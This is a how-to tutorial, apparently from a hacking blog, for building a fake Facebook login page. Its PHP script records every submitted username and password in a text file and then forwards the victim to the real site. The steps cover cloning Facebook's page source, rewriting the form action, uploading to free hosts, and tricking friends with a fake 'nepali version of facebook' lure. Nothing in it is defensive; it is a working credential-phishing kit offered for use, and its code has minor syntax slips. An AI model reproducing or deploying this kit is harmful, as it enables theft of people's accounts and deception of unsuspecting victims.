1.Php page
2.Fake facebook login page
3.Text file to store password
Open notepad and copy this code:
header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;?>
Your php file is now created
If you don’t understand what this php file is doing you need to learn some basic of php. This php file will save information of victim in file password.txt .
Fake Facebook page
Now go to http://www.facebook.com and right click and then View Source. Copy source in notepad and save it as facebooklogin.html. Now open source code of this html file. We need to find the place where login code in facebook page is that redirects the users upon clicking on it. Now Press Crtl+F after opening source code and search for this code: action=anything
In this case we have this
action="https://login.facebook.com/login.php?" We replace that part with: action="phishing.php"
Text file
Create a blank text file and name it password.txt
http://www.justfree.com/
http://www.ripway.com/
Suppose you register with name nepalifacebook. Your link will behttp://www.nepalifacebook.100mb.com. After uploading files, your phishing link will be http://www.nepalifacebook.100mb.com/facebooklogin.html. Send this link to your friends. If they login on your phising site, their password will be save at the server. You can trick your friend to login this fake facebook page by saying that it's nepali version of facebook- check it out, or in any way you like.